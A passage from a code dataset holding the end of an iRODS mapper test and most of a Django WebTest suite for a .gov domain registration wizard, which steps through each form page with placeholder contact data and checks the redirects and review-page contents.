self.mapper.get_all_since(datetime.min)\n if len(inital_updates) == 0:\n return datetime.min\n return inital_updates.get_most_recent()[0].timestamp\n\n def tearDown(self):\n self.test_with_baton.tear_down()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"wtsi-hgi/cookie-monster","sub_path":"cookiemonster/tests/retriever/source/irods/test_baton_mappers.py","file_name":"test_baton_mappers.py","file_ext":"py","file_size_in_byte":6075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"6206154562","text":"from unittest import skip\nfrom unittest.mock import MagicMock, ANY, patch\n\nfrom django.conf import settings\nfrom django.test import Client, TestCase\nfrom django.urls import reverse\nfrom django.contrib.auth import get_user_model\nfrom .common import MockEppLib, completed_application, create_user # type: ignore\n\nfrom django_webtest import WebTest # type: ignore\nimport boto3_mocking # type: ignore\n\nfrom registrar.utility.errors import (\n NameserverError,\n NameserverErrorCodes,\n SecurityEmailError,\n SecurityEmailErrorCodes,\n GenericError,\n GenericErrorCodes,\n DsDataError,\n DsDataErrorCodes,\n)\n\nfrom registrar.models import (\n DomainApplication,\n Domain,\n DomainInformation,\n DraftDomain,\n DomainInvitation,\n Contact,\n PublicContact,\n Website,\n UserDomainRole,\n User,\n)\nfrom registrar.views.application import ApplicationWizard, Step\n\nfrom .common import less_console_noise\n\n\nclass TestViews(TestCase):\n def setUp(self):\n self.client = Client()\n\n def test_health_check_endpoint(self):\n response = self.client.get(\"/health/\")\n self.assertContains(response, \"OK\", status_code=200)\n\n def test_home_page(self):\n \"\"\"Home page should NOT be available without a login.\"\"\"\n response = self.client.get(\"/\")\n self.assertEqual(response.status_code, 302)\n\n def test_application_form_not_logged_in(self):\n \"\"\"Application form not accessible without a logged-in user.\"\"\"\n response = self.client.get(\"/register/\")\n self.assertEqual(response.status_code, 302)\n self.assertIn(\"/login?next=/register/\", response.headers[\"Location\"])\n\n\nclass TestWithUser(MockEppLib):\n def setUp(self):\n super().setUp()\n username = \"test_user\"\n first_name = \"First\"\n last_name = \"Last\"\n email = \"info@example.com\"\n self.user = get_user_model().objects.create(\n username=username, first_name=first_name, last_name=last_name, email=email\n )\n\n def tearDown(self):\n # delete any applications too\n super().tearDown()\n DomainApplication.objects.all().delete()\n self.user.delete()\n\n\nclass LoggedInTests(TestWithUser):\n def setUp(self):\n super().setUp()\n self.client.force_login(self.user)\n\n def test_home_lists_domain_applications(self):\n response = self.client.get(\"/\")\n self.assertNotContains(response, \"igorville.gov\")\n site = DraftDomain.objects.create(name=\"igorville.gov\")\n application = DomainApplication.objects.create(creator=self.user, requested_domain=site)\n response = self.client.get(\"/\")\n # count = 2 because it is also in screenreader content\n self.assertContains(response, \"igorville.gov\", count=2)\n # clean up\n application.delete()\n\n def test_home_lists_domains(self):\n response = self.client.get(\"/\")\n domain, _ = Domain.objects.get_or_create(name=\"igorville.gov\")\n self.assertNotContains(response, \"igorville.gov\")\n role, _ = UserDomainRole.objects.get_or_create(user=self.user, domain=domain, role=UserDomainRole.Roles.MANAGER)\n response = self.client.get(\"/\")\n # count = 2 because it is also in screenreader content\n self.assertContains(response, \"igorville.gov\", count=2)\n self.assertContains(response, \"DNS needed\")\n # clean up\n role.delete()\n\n def test_application_form_view(self):\n response = self.client.get(\"/register/\", follow=True)\n self.assertContains(\n response,\n \"What kind of U.S.-based government organization do you represent?\",\n )\n\n def test_domain_application_form_with_ineligible_user(self):\n \"\"\"Application form not accessible for an ineligible user.\n This test should be solid enough since all application wizard\n views share the same permissions class\"\"\"\n self.user.status = User.RESTRICTED\n self.user.save()\n\n with less_console_noise():\n response = self.client.get(\"/register/\", follow=True)\n print(response.status_code)\n self.assertEqual(response.status_code, 403)\n\n\nclass DomainApplicationTests(TestWithUser, WebTest):\n\n \"\"\"Webtests for domain application to test filling and submitting.\"\"\"\n\n # Doesn't work with CSRF checking\n # hypothesis is that CSRF_USE_SESSIONS is incompatible with WebTest\n csrf_checks = False\n\n def setUp(self):\n super().setUp()\n self.app.set_user(self.user.username)\n self.TITLES = ApplicationWizard.TITLES\n\n def test_application_form_empty_submit(self):\n # 302 redirect to the first form\n page = self.app.get(reverse(\"application:\")).follow()\n # submitting should get back the same page if the required field is empty\n result = page.forms[0].submit()\n self.assertIn(\"What kind of U.S.-based government organization do you represent?\", result)\n\n def test_application_multiple_applications_exist(self):\n \"\"\"Test that an info message appears when user has multiple applications already\"\"\"\n # create and submit an application\n application = completed_application(user=self.user)\n application.submit()\n application.save()\n\n # now, attempt to create another one\n with less_console_noise():\n page = self.app.get(\"/register/\").follow()\n self.assertContains(page, \"You cannot submit this request yet\")\n\n @boto3_mocking.patching\n def test_application_form_submission(self):\n \"\"\"\n Can fill out the entire form and submit.\n As we add additional form pages, we need to include them here to make\n this test work.\n\n This test also looks for the long organization name on the summary page.\n\n This also tests for the presence of a modal trigger and the dynamic test\n in the modal header on the submit page.\n \"\"\"\n num_pages_tested = 0\n # elections, type_of_work, tribal_government, no_other_contacts\n SKIPPED_PAGES = 4\n num_pages = len(self.TITLES) - SKIPPED_PAGES\n\n type_page = self.app.get(reverse(\"application:\")).follow()\n # django-webtest does not handle cookie-based sessions well because it keeps\n # resetting the session key on each new request, thus destroying the concept\n # of a \"session\". We are going to do it manually, saving the session ID here\n # and then setting the cookie on each request.\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n\n # ---- TYPE PAGE ----\n type_form = type_page.forms[0]\n type_form[\"organization_type-organization_type\"] = \"federal\"\n # test next button and validate data\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n type_result = type_form.submit()\n # should see results in db\n application = DomainApplication.objects.get() # there's only one\n self.assertEqual(application.organization_type, \"federal\")\n # the post request should return a redirect to the next form in\n # the application\n self.assertEqual(type_result.status_code, 302)\n self.assertEqual(type_result[\"Location\"], \"/register/organization_federal/\")\n num_pages_tested += 1\n\n # ---- FEDERAL BRANCH PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n\n federal_page = type_result.follow()\n federal_form = federal_page.forms[0]\n federal_form[\"organization_federal-federal_type\"] = \"executive\"\n\n # test next button\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n federal_result = federal_form.submit()\n # validate that data from this step are being saved\n application = DomainApplication.objects.get() # there's only one\n self.assertEqual(application.federal_type, \"executive\")\n # the post request should return a redirect to the next form in\n # the application\n self.assertEqual(federal_result.status_code, 302)\n self.assertEqual(federal_result[\"Location\"], \"/register/organization_contact/\")\n num_pages_tested += 1\n\n # ---- ORG CONTACT PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n org_contact_page = federal_result.follow()\n org_contact_form = org_contact_page.forms[0]\n # federal agency so we have to fill in federal_agency\n org_contact_form[\"organization_contact-federal_agency\"] = \"General Services Administration\"\n org_contact_form[\"organization_contact-organization_name\"] = \"Testorg\"\n org_contact_form[\"organization_contact-address_line1\"] = \"address 1\"\n org_contact_form[\"organization_contact-address_line2\"] = \"address 2\"\n org_contact_form[\"organization_contact-city\"] = \"NYC\"\n org_contact_form[\"organization_contact-state_territory\"] = \"NY\"\n org_contact_form[\"organization_contact-zipcode\"] = \"10002\"\n org_contact_form[\"organization_contact-urbanization\"] = \"URB Royal Oaks\"\n\n # test next button\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n org_contact_result = org_contact_form.submit()\n # validate that data from this step are being saved\n application = DomainApplication.objects.get() # there's only one\n self.assertEqual(application.organization_name, \"Testorg\")\n self.assertEqual(application.address_line1, \"address 1\")\n self.assertEqual(application.address_line2, \"address 2\")\n self.assertEqual(application.city, \"NYC\")\n self.assertEqual(application.state_territory, \"NY\")\n self.assertEqual(application.zipcode, \"10002\")\n self.assertEqual(application.urbanization, \"URB Royal Oaks\")\n # the post request should return a redirect to the next form in\n # the application\n self.assertEqual(org_contact_result.status_code, 302)\n self.assertEqual(org_contact_result[\"Location\"], \"/register/authorizing_official/\")\n num_pages_tested += 1\n\n # ---- AUTHORIZING OFFICIAL PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n ao_page = org_contact_result.follow()\n ao_form = ao_page.forms[0]\n ao_form[\"authorizing_official-first_name\"] = \"Testy ATO\"\n ao_form[\"authorizing_official-last_name\"] = \"Tester ATO\"\n ao_form[\"authorizing_official-title\"] = \"Chief Tester\"\n ao_form[\"authorizing_official-email\"] = \"testy@town.com\"\n\n # test next button\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n ao_result = ao_form.submit()\n # validate that data from this step are being saved\n application = DomainApplication.objects.get() # there's only one\n self.assertEqual(application.authorizing_official.first_name, \"Testy ATO\")\n self.assertEqual(application.authorizing_official.last_name, \"Tester ATO\")\n self.assertEqual(application.authorizing_official.title, \"Chief Tester\")\n self.assertEqual(application.authorizing_official.email, \"testy@town.com\")\n # the post request should return a redirect to the next form in\n # the application\n self.assertEqual(ao_result.status_code, 302)\n self.assertEqual(ao_result[\"Location\"], \"/register/current_sites/\")\n num_pages_tested += 1\n\n # ---- CURRENT SITES PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n current_sites_page = ao_result.follow()\n current_sites_form = current_sites_page.forms[0]\n current_sites_form[\"current_sites-0-website\"] = \"www.city.com\"\n\n # test next button\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n current_sites_result = current_sites_form.submit()\n # validate that data from this step are being saved\n application = DomainApplication.objects.get() # there's only one\n self.assertEqual(\n application.current_websites.filter(website=\"http://www.city.com\").count(),\n 1,\n )\n # the post request should return a redirect to the next form in\n # the application\n self.assertEqual(current_sites_result.status_code, 302)\n self.assertEqual(current_sites_result[\"Location\"], \"/register/dotgov_domain/\")\n num_pages_tested += 1\n\n # ---- DOTGOV DOMAIN PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n dotgov_page = current_sites_result.follow()\n dotgov_form = dotgov_page.forms[0]\n dotgov_form[\"dotgov_domain-requested_domain\"] = \"city\"\n dotgov_form[\"dotgov_domain-0-alternative_domain\"] = \"city1\"\n\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n dotgov_result = dotgov_form.submit()\n # validate that data from this step are being saved\n application = DomainApplication.objects.get() # there's only one\n self.assertEqual(application.requested_domain.name, \"city.gov\")\n self.assertEqual(application.alternative_domains.filter(website=\"city1.gov\").count(), 1)\n # the post request should return a redirect to the next form in\n # the application\n self.assertEqual(dotgov_result.status_code, 302)\n self.assertEqual(dotgov_result[\"Location\"], \"/register/purpose/\")\n num_pages_tested += 1\n\n # ---- PURPOSE PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n purpose_page = dotgov_result.follow()\n purpose_form = purpose_page.forms[0]\n purpose_form[\"purpose-purpose\"] = \"For all kinds of things.\"\n\n # test next button\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n purpose_result = purpose_form.submit()\n # validate that data from this step are being saved\n application = DomainApplication.objects.get() # there's only one\n self.assertEqual(application.purpose, \"For all kinds of things.\")\n # the post request should return a redirect to the next form in\n # the application\n self.assertEqual(purpose_result.status_code, 302)\n self.assertEqual(purpose_result[\"Location\"], \"/register/your_contact/\")\n num_pages_tested += 1\n\n # ---- YOUR CONTACT INFO PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n your_contact_page = purpose_result.follow()\n your_contact_form = your_contact_page.forms[0]\n\n your_contact_form[\"your_contact-first_name\"] = \"Testy you\"\n your_contact_form[\"your_contact-last_name\"] = \"Tester you\"\n your_contact_form[\"your_contact-title\"] = \"Admin Tester\"\n your_contact_form[\"your_contact-email\"] = \"testy-admin@town.com\"\n your_contact_form[\"your_contact-phone\"] = \"(201) 555 5556\"\n\n # test next button\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n your_contact_result = your_contact_form.submit()\n # validate that data from this step are being saved\n application = DomainApplication.objects.get() # there's only one\n self.assertEqual(application.submitter.first_name, \"Testy you\")\n self.assertEqual(application.submitter.last_name, \"Tester you\")\n self.assertEqual(application.submitter.title, \"Admin Tester\")\n self.assertEqual(application.submitter.email, \"testy-admin@town.com\")\n self.assertEqual(application.submitter.phone, \"(201) 555 5556\")\n # the post request should return a redirect to the next form in\n # the application\n self.assertEqual(your_contact_result.status_code, 302)\n self.assertEqual(your_contact_result[\"Location\"], \"/register/other_contacts/\")\n num_pages_tested += 1\n\n # ---- OTHER CONTACTS PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n other_contacts_page = your_contact_result.follow()\n other_contacts_form = other_contacts_page.forms[0]\n\n other_contacts_form[\"other_contacts-0-first_name\"] = \"Testy2\"\n other_contacts_form[\"other_contacts-0-last_name\"] = \"Tester2\"\n other_contacts_form[\"other_contacts-0-title\"] = \"Another Tester\"\n other_contacts_form[\"other_contacts-0-email\"] = \"testy2@town.com\"\n other_contacts_form[\"other_contacts-0-phone\"] = \"(201) 555 5557\"\n\n # test next button\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n other_contacts_result = other_contacts_form.submit()\n # validate that data from this step are being saved\n application = DomainApplication.objects.get() # there's only one\n self.assertEqual(\n application.other_contacts.filter(\n first_name=\"Testy2\",\n last_name=\"Tester2\",\n title=\"Another Tester\",\n email=\"testy2@town.com\",\n phone=\"(201) 555 5557\",\n ).count(),\n 1,\n )\n # the post request should return a redirect to the next form in\n # the application\n self.assertEqual(other_contacts_result.status_code, 302)\n self.assertEqual(other_contacts_result[\"Location\"], \"/register/anything_else/\")\n num_pages_tested += 1\n\n # ---- ANYTHING ELSE PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n anything_else_page = other_contacts_result.follow()\n anything_else_form = anything_else_page.forms[0]\n\n anything_else_form[\"anything_else-anything_else\"] = \"Nothing else.\"\n\n # test next button\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n anything_else_result = anything_else_form.submit()\n # validate that data from this step are being saved\n application = DomainApplication.objects.get() # there's only one\n self.assertEqual(application.anything_else, \"Nothing else.\")\n # the post request should return a redirect to the next form in\n # the application\n self.assertEqual(anything_else_result.status_code, 302)\n self.assertEqual(anything_else_result[\"Location\"], \"/register/requirements/\")\n num_pages_tested += 1\n\n # ---- REQUIREMENTS PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n requirements_page = anything_else_result.follow()\n requirements_form = requirements_page.forms[0]\n\n requirements_form[\"requirements-is_policy_acknowledged\"] = True\n\n # test next button\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n requirements_result = requirements_form.submit()\n # validate that data from this step are being saved\n application = DomainApplication.objects.get() # there's only one\n self.assertEqual(application.is_policy_acknowledged, True)\n # the post request should return a redirect to the next form in\n # the application\n self.assertEqual(requirements_result.status_code, 302)\n self.assertEqual(requirements_result[\"Location\"], \"/register/review/\")\n num_pages_tested += 1\n\n # ---- REVIEW AND FINSIHED PAGES ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n review_page = requirements_result.follow()\n review_form = review_page.forms[0]\n\n # Review page contains all the previously entered data\n # Let's make sure the long org name is displayed\n self.assertContains(review_page, \"Federal: an agency of the U.S. government\")\n self.assertContains(review_page, \"Executive\")\n self.assertContains(review_page, \"Testorg\")\n self.assertContains(review_page, \"address 1\")\n self.assertContains(review_page, \"address 2\")\n self.assertContains(review_page, \"NYC\")\n self.assertContains(review_page, \"NY\")\n self.assertContains(review_page, \"10002\")\n self.assertContains(review_page, \"URB Royal Oaks\")\n self.assertContains(review_page, \"Testy ATO\")\n self.assertContains(review_page, \"Tester ATO\")\n self.assertContains(review_page, \"Chief Tester\")\n self.assertContains(review_page, \"testy@town.com\")\n self.assertContains(review_page, \"city.com\")\n self.assertContains(review_page, \"city.gov\")\n self.assertContains(review_page, \"city1.gov\")\n self.assertContains(review_page, \"For all kinds of things.\")\n self.assertContains(review_page, \"Testy you\")\n self.assertContains(review_page, \"Tester you\")\n self.assertContains(review_page, \"Admin Tester\")\n self.assertContains(review_page, \"testy-admin@town.com\")\n self.assertContains(review_page, \"(201) 555-5556\")\n self.assertContains(review_page, \"Testy2\")\n self.assertContains(review_page, \"Tester2\")\n self.assertContains(review_page, \"Another Tester\")\n self.assertContains(review_page, \"testy2@town.com\")\n self.assertContains(review_page, \"(201) 555-5557\")\n self.assertContains(review_page, \"Nothing else.\")\n\n # We can't test the modal itself as it relies on JS for init and triggering,\n # but we can test for the existence of its trigger:\n self.assertContains(review_page, \"toggle-submit-domain-request\")\n # And the existence of the modal's data parked and ready for the js init.\n # The next assert also tests for the passed requested domain context from\n # the view > application_form > modal\n self.assertContains(review_page, \"You are about to submit a domain request for city.gov\")\n\n # final submission results in a redirect to the \"finished\" URL\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n with less_console_noise():\n review_result = review_form.submit()\n\n self.assertEqual(review_result.status_code, 302)\n self.assertEqual(review_result[\"Location\"], \"/register/finished/\")\n num_pages_tested += 1\n\n # following this redirect is a GET request, so include the cookie\n # here too.\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n with less_console_noise():\n final_result = review_result.follow()\n self.assertContains(final_result, \"Thanks for your domain request!\")\n\n # check that any new pages are added to this test\n self.assertEqual(num_pages, num_pages_tested)\n\n # This is the start of a test to check an existing application, it currently\n # does not work and results in errors as noted in:\n # https://github.com/cisagov/getgov/pull/728\n @skip(\"WIP\")\n def test_application_form_started_allsteps(self):\n num_pages_tested = 0\n # elections, type_of_work, tribal_government, no_other_contacts\n SKIPPED_PAGES = 4\n DASHBOARD_PAGE = 1\n num_pages = len(self.TITLES) - SKIPPED_PAGES + DASHBOARD_PAGE\n\n application = completed_application(user=self.user)\n application.save()\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"city.gov\")\n self.assertContains(home_page, \"Started\")\n num_pages_tested += 1\n\n # TODO: For some reason this click results in a new application being generated\n # This appraoch is an alternatie to using get as is being done below\n #\n # type_page = home_page.click(\"Edit\")\n\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n url = reverse(\"edit-application\", kwargs={\"id\": application.pk})\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n\n # TODO: The following line results in a django error on middleware\n response = self.client.get(url, follow=True)\n self.assertContains(response, \"Type of organization\")\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # TODO: Step through the remaining pages\n\n self.assertEqual(num_pages, num_pages_tested)\n\n def test_application_form_conditional_federal(self):\n \"\"\"Federal branch question is shown for federal organizations.\"\"\"\n type_page = self.app.get(reverse(\"application:\")).follow()\n # django-webtest does not handle cookie-based sessions well because it keeps\n # resetting the session key on each new request, thus destroying the concept\n # of a \"session\". We are going to do it manually, saving the session ID here\n # and then setting the cookie on each request.\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n\n # ---- TYPE PAGE ----\n\n # the conditional step titles shouldn't appear initially\n self.assertNotContains(type_page, self.TITLES[\"organization_federal\"])\n self.assertNotContains(type_page, self.TITLES[\"organization_election\"])\n type_form = type_page.forms[0]\n type_form[\"organization_type-organization_type\"] = \"federal\"\n\n # set the session ID before .submit()\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n type_result = type_form.submit()\n\n # the post request should return a redirect to the federal branch\n # question\n self.assertEqual(type_result.status_code, 302)\n self.assertEqual(type_result[\"Location\"], \"/register/organization_federal/\")\n\n # and the step label should appear in the sidebar of the resulting page\n # but the step label for the elections page should not appear\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n federal_page = type_result.follow()\n self.assertContains(federal_page, self.TITLES[\"organization_federal\"])\n self.assertNotContains(federal_page, self.TITLES[\"organization_election\"])\n\n # continuing on in the flow we need to see top-level agency on the\n # contact page\n federal_page.forms[0][\"organization_federal-federal_type\"] = \"executive\"\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n federal_result = federal_page.forms[0].submit()\n # the post request should return a redirect to the contact\n # question\n self.assertEqual(federal_result.status_code, 302)\n self.assertEqual(federal_result[\"Location\"], \"/register/organization_contact/\")\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n contact_page = federal_result.follow()\n self.assertContains(contact_page, \"Federal agency\")\n\n def test_application_form_conditional_elections(self):\n \"\"\"Election question is shown for other organizations.\"\"\"\n type_page = self.app.get(reverse(\"application:\")).follow()\n # django-webtest does not handle cookie-based sessions well because it keeps\n # resetting the session key on each new request, thus destroying the concept\n # of a \"session\". We are going to do it manually, saving the session ID here\n # and then setting the cookie on each request.\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n\n # ---- TYPE PAGE ----\n\n # the conditional step titles shouldn't appear initially\n self.assertNotContains(type_page, self.TITLES[\"organization_federal\"])\n self.assertNotContains(type_page, self.TITLES[\"organization_election\"])\n type_form = type_page.forms[0]\n type_form[\"organization_type-organization_type\"] = \"county\"\n\n # set the session ID before .submit()\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n type_result = type_form.submit()\n\n # the post request should return a redirect to the elections question\n self.assertEqual(type_result.status_code, 302)\n self.assertEqual(type_result[\"Location\"], \"/register/organization_election/\")\n\n # and the step label should appear in the sidebar of the resulting page\n # but the step label for the elections page should not appear\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n election_page = type_result.follow()\n self.assertContains(election_page, self.TITLES[\"organization_election\"])\n self.assertNotContains(election_page, self.TITLES[\"organization_federal\"])\n\n # continuing on in the flow we need to NOT see top-level agency on the\n # contact page\n election_page.forms[0][\"organization_election-is_election_board\"] = \"True\"\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n election_result = election_page.forms[0].submit()\n # the post request should return a redirect to the contact\n # question\n self.assertEqual(election_result.status_code, 302)\n self.assertEqual(election_result[\"Location\"], \"/register/organization_contact/\")\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n contact_page = election_result.follow()\n self.assertNotContains(contact_page, \"Federal agency\")\n\n def test_application_form_section_skipping(self):\n \"\"\"Can skip forward and back in sections\"\"\"\n type_page = self.app.get(reverse(\"application:\")).follow()\n # django-webtest does not handle cookie-based sessions well because it keeps\n # resetting the session key on each new request, thus destroying the concept\n # of a \"session\". We are going to do it manually, saving the session ID here\n # and then setting the cookie on each request.\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n\n type_form = type_page.forms[0]\n type_form[\"organization_type-organization_type\"] = \"federal\"\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n type_result = type_form.submit()\n\n # follow first redirect\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n federal_page = type_result.follow()\n\n # Now on federal type page, click back to the organization type\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n new_page = federal_page.click(str(self.TITLES[\"organization_type\"]), index=0)\n\n # Should be a link to the organization_federal page\n self.assertGreater(\n len(new_page.html.find_all(\"a\", href=\"/register/organization_federal/\")),\n 0,\n )\n\n def test_application_form_nonfederal(self):\n \"\"\"Non-federal organizations don't have to provide their federal agency.\"\"\"\n type_page = self.app.get(reverse(\"application:\")).follow()\n # django-webtest does not handle cookie-based sessions well because it keeps\n # resetting the session key on each new request, thus destroying the concept\n # of a \"session\". We are going to do it manually, saving the session ID here\n # and then setting the cookie on each request.\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n\n type_form = type_page.forms[0]\n type_form[\"organization_type-organization_type\"] = DomainApplication.OrganizationChoices.INTERSTATE\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n type_result = type_form.submit()\n\n # follow first redirect\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n contact_page = type_result.follow()\n org_contact_form = contact_page.forms[0]\n\n self.assertNotIn(\"federal_agency\", org_contact_form.fields)\n\n # minimal fields that must be filled out\n org_contact_form[\"organization_contact-organization_name\"] = \"Testorg\"\n org_contact_form[\"organization_contact-address_line1\"] = \"address 1\"\n org_contact_form[\"organization_contact-city\"] = \"NYC\"\n org_contact_form[\"organization_contact-state_territory\"] = \"NY\"\n org_contact_form[\"organization_contact-zipcode\"] = \"10002\"\n\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n contact_result = org_contact_form.submit()\n\n # the post request should return a redirect to the\n # about your organization page if it was successful.\n self.assertEqual(contact_result.status_code, 302)\n self.assertEqual(contact_result[\"Location\"], \"/register/about_your_organization/\")\n\n def test_application_about_your_organization_special(self):\n \"\"\"Special districts have to answer an additional question.\"\"\"\n type_page = self.app.get(reverse(\"application:\")).follow()\n # django-webtest does not handle cookie-based sessions well because it keeps\n # resetting the session key on each new request, thus destroying the concept\n # of a \"session\". We are going to do it manually, saving the session ID here\n # and then setting the cookie on each request.\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n\n type_form = type_page.forms[0]\n type_form[\"organization_type-organization_type\"] = DomainApplication.OrganizationChoices.SPECIAL_DISTRICT\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n type_result = type_page.forms[0].submit()\n # follow first redirect\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n contact_page = type_result.follow()\n\n self.assertContains(contact_page, self.TITLES[Step.ABOUT_YOUR_ORGANIZATION])\n\n def test_application_no_other_contacts(self):\n \"\"\"Applicants with no other contacts have to give a reason.\"\"\"\n contacts_page = self.app.get(reverse(\"application:other_contacts\"))\n # django-webtest does not handle cookie-based sessions well because it keeps\n # resetting the session key on each new request, thus destroying the concept\n # of a \"session\". We are going to do it manually, saving the session ID here\n # and then setting the cookie on each request.\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n result = contacts_page.forms[0].submit()\n # follow first redirect\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n no_contacts_page = result.follow()\n expected_url_slug = str(Step.NO_OTHER_CONTACTS)\n actual_url_slug = no_contacts_page.request.path.split(\"/\")[-2]\n self.assertEqual(expected_url_slug, actual_url_slug)\n\n def test_application_about_your_organiztion_interstate(self):\n \"\"\"Special districts have to answer an additional question.\"\"\"\n type_page = self.app.get(reverse(\"application:\")).follow()\n # django-webtest does not handle cookie-based sessions well because it keeps\n # resetting the session key on each new request, thus destroying the concept\n # of a \"session\". We are going to do it manually, saving the session ID here\n # and then setting the cookie on each request.\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n\n type_form = type_page.forms[0]\n type_form[\"organization_type-organization_type\"] = DomainApplication.OrganizationChoices.INTERSTATE\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n type_result = type_form.submit()\n # follow first redirect\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n contact_page = type_result.follow()\n\n self.assertContains(contact_page, self.TITLES[Step.ABOUT_YOUR_ORGANIZATION])\n\n def test_application_tribal_government(self):\n \"\"\"Tribal organizations have to answer an additional question.\"\"\"\n type_page = self.app.get(reverse(\"application:\")).follow()\n # django-webtest does not handle cookie-based sessions well because it keeps\n # resetting the session key on each new request, thus destroying the concept\n # of a \"session\". We are going to do it manually, saving the session ID here\n # and then setting the cookie on each request.\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n type_form = type_page.forms[0]\n type_form[\"organization_type-organization_type\"] = DomainApplication.OrganizationChoices.TRIBAL\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n type_result = type_form.submit()\n # the tribal government page comes immediately afterwards\n self.assertIn(\"/tribal_government\", type_result.headers[\"Location\"])\n # follow first redirect\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n tribal_government_page = type_result.follow()\n\n # and the step is on the sidebar list.\n self.assertContains(tribal_government_page, self.TITLES[Step.TRIBAL_GOVERNMENT])\n\n def test_application_ao_dynamic_text(self):\n type_page = self.app.get(reverse(\"application:\")).follow()\n # django-webtest does not handle cookie-based sessions well because it keeps\n # resetting the session key on each new request, thus destroying the concept\n # of a \"session\". We are going to do it manually, saving the session ID here\n # and then setting the cookie on each request.\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n\n # ---- TYPE PAGE ----\n type_form = type_page.forms[0]\n type_form[\"organization_type-organization_type\"] = \"federal\"\n\n # test next button\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n type_result = type_form.submit()\n\n # ---- FEDERAL BRANCH PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n federal_page = type_result.follow()\n federal_form = federal_page.forms[0]\n federal_form[\"organization_federal-federal_type\"] = \"executive\"\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n federal_result = federal_form.submit()\n\n # ---- ORG CONTACT PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n org_contact_page = federal_result.follow()\n org_contact_form = org_contact_page.forms[0]\n # federal agency so we have to fill in federal_agency\n org_contact_form[\"organization_contact-federal_agency\"] = \"General Services Administration\"\n org_contact_form[\"organization_contact-organization_name\"] = \"Testorg\"\n org_contact_form[\"organization_contact-address_line1\"] = \"address 1\"\n org_contact_form[\"organization_contact-address_line2\"] = \"address 2\"\n org_contact_form[\"organization_contact-city\"] = 